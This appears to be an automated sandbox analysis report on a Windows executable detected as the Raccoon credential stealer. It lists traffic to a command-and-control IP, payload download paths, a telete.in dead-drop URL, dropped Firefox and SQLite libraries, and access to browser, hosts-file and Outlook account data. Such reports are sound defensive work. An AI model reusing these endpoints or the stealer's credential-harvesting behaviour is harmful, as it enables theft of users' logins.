                      Source: global trafficHTTP traffic detected: GET //l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.228.114.197
                      Source: global trafficHTTP traffic detected: GET //l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.228.114.197
                      Source: unknownDNS traffic detected: queries for: telete.in
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 94.228.114.197
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://94.228.114.197
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://94.228.114.197/
                      Source: KnZsSmDyF3.exe, 00000001.00000003.207802227.0000000000D56000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f
                      Source: KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f277U
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/65fddda9bf877b11988a80a9c7a03ff1ac6a108f=jsonoL
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f2y
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://94.228.114.197//l/f/t--ny3oBagrSXdgRr-eA/ae3c4e3333af17553eef71298da070dcf215425f4
                      Source: KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://94.228.114.197/2t
                      Source: KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://94.228.114.197/I_
                      Source: KnZsSmDyF3.exe, 00000001.00000003.207821571.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://94.228.114.197/S
                      Source: KnZsSmDyF3.exe, 00000001.00000003.207812712.0000000000D63000.00000004.00000001.sdmpString found in binary or memory: http://94.228.114.197/dhHq
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                      Source: softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                      Source: softokn3.dll.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                      Source: softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                      Source: softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
                      Source: softokn3.dll.1.drString found in binary or memory: http://ocsp.thawte.com0
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0Y
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
                      Source: softokn3.dll.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                      Source: softokn3.dll.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                      Source: softokn3.dll.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                      Source: KnZsSmDyF3.exe, 00000001.00000002.220844808.000000006E199000.00000002.00020000.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                      Source: softokn3.dll.1.drString found in binary or memory: http://www.mozilla.com0
                      Source: sqlite3.dll.1.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: 1xVPfvJcrg.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: 1xVPfvJcrg.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: 1xVPfvJcrg.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: 1xVPfvJcrg.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: 1xVPfvJcrg.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                      Source: 1xVPfvJcrg.1.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: 1xVPfvJcrg.1.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219865851.0000000000DBB000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=pV
                      Source: KnZsSmDyF3.exe, 00000001.00000003.207846057.0000000000DB0000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207812712.0000000000D63000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207851913.0000000000DBB000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207795100.0000000000DC0000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219865851.0000000000DBB000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                      Source: KnZsSmDyF3.exe, 00000001.00000003.207846057.0000000000DB0000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207812712.0000000000D63000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207851913.0000000000DBB000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000003.207795100.0000000000DC0000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000002.219853041.0000000000DB0000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmp, KnZsSmDyF3.exe, 00000001.00000002.219771194.0000000000D36000.00000004.00000001.sdmpString found in binary or memory: https://telete.in/jagressor_kz
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219771194.0000000000D36000.00000004.00000001.sdmpString found in binary or memory: https://telete.in/jagressor_kzn-
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219821124.0000000000D70000.00000004.00000001.sdmpString found in binary or memory: https://telete.in/org/img/t_logo.png
                      Source: KnZsSmDyF3.exe, 00000001.00000002.220797019.000000004C8CD000.00000004.00000001.sdmpString found in binary or memory: https://wa228.114.197/
                      Source: softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: KnZsSmDyF3.exe, 00000001.00000003.217777569.0000000000DC3000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0H
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0n_
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0renc
                      Source: KnZsSmDyF3.exe, 00000001.00000002.219804163.0000000000D5C000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
                      Source: 1xVPfvJcrg.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownHTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.3:49718 version: TLS 1.2

                      E-Banking Fraud:

                      barindex
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 1.2.KnZsSmDyF3.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.KnZsSmDyF3.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.KnZsSmDyF3.exe.2670e50.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.KnZsSmDyF3.exe.2770000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.KnZsSmDyF3.exe.2670e50.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.KnZsSmDyF3.exe.2770000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000003.200402548.0000000002770000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.219422530.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.219929790.0000000002670000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: KnZsSmDyF3.exe PID: 4712, type: MEMORY
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0043C3A8: DeviceIoControl,GetLastError,1_2_0043C3A8
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_004340F31_2_004340F3
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0043454E1_2_0043454E
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0040C72C1_2_0040C72C
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0041E7C41_2_0041E7C4
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0040CD041_2_0040CD04
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0040EE221_2_0040EE22
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0043AFE41_2_0043AFE4
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_00432F9D1_2_00432F9D
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0040D4071_2_0040D407
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0041D4251_2_0041D425
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_004278581_2_00427858
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0042982C1_2_0042982C
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0040DE521_2_0040DE52
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0041DE021_2_0041DE02
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_004400D51_2_004400D5
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_004481401_2_00448140
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0044617A1_2_0044617A
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_004581391_2_00458139
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_004582591_2_00458259
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0042837C1_2_0042837C
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0041C3151_2_0041C315
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_004623DB1_2_004623DB
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_004203FE1_2_004203FE
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_004403901_2_00440390
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0043A4921_2_0043A492
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0041656D1_2_0041656D
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_00440AC01_2_00440AC0
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_00414A8F1_2_00414A8F
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0045AC8D1_2_0045AC8D
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_00416E0E1_2_00416E0E
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0041AE2C1_2_0041AE2C
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_0044AF581_2_0044AF58
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: String function: 004656D0 appears 127 times
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: String function: 0044CDB9 appears 33 times
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: String function: 0043DE50 appears 40 times
                      Source: sqlite3.dll.1.drStatic PE information: Number of sections : 18 > 10
                      Source: KnZsSmDyF3.exeStatic PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
                      Source: KnZsSmDyF3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: KnZsSmDyF3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: KnZsSmDyF3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: KnZsSmDyF3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: KnZsSmDyF3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: KnZsSmDyF3.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: api-ms-win-core-string-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-synch-l1-2-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-sysinfo-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-profile-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-processthreads-l1-1-1.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-namedpipe-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-processthreads-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-util-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-processenvironment-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-synch-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-timezone-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                      Source: KnZsSmDyF3.exe, 00000001.00000002.220638860.000000004BA70000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs KnZsSmDyF3.exe
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221075413.000000006E2FB000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamenss3.dll8 vs KnZsSmDyF3.exe
                      Source: KnZsSmDyF3.exe, 00000001.00000002.220859964.000000006E1A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamemozglue.dll8 vs KnZsSmDyF3.exe
                      Source: KnZsSmDyF3.exe, 00000001.00000003.217738997.000000004C8D5000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs KnZsSmDyF3.exe
                      Source: KnZsSmDyF3.exe, 00000001.00000002.220053335.0000000002750000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs KnZsSmDyF3.exe
                      Source: KnZsSmDyF3.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                      Source: KnZsSmDyF3.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/66@1/2
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCode function: 1_2_00427783 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,1_2_00427783
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to behavior
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeMutant created: \Sessions\1\BaseNamedObjects\uiabfqwfuuser
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeCommand line argument: MF1_2_00464D40
                      Source: KnZsSmDyF3.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp, sqlite3.dll.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: softokn3.dll.1.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                      Source: softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp, sqlite3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp, sqlite3.dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp, sqlite3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                      Source: softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                      Source: softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                      Source: softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s;
                      Source: softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                      Source: sqlite3.dll.1.drBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp, sqlite3.dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmpBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                      Source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmpBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
                      Source: sqlite3.dll.1.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: KnZsSmDyF3.exeVirustotal: Detection: 62%
                      Source: KnZsSmDyF3.exeMetadefender: Detection: 28%
                      Source: KnZsSmDyF3.exeReversingLabs: Detection: 75%
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account ManagerJump to behavior
                      Source: C:\Users\user\Desktop\KnZsSmDyF3.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: KnZsSmDyF3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: KnZsSmDyF3.exe, 00000001.00000002.221026500.000000006E2C0000.00000002.00020000.sdmp
                      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr
                      Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr
                      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: KnZsSmDyF3.exe, 00000001.00000002.220844808.000000006E199000.00000002.00020000.sdmp
                      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr
                      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr
                      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
                      Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr
                      Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr
                      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
                      Source: Binary string: .C:\xiyo\pawiyafa kezig\bokinecabigu\xoze\32\bezunu.pdb source: KnZsSmDyF3.exe
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr
                      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr
                      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr
                      Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
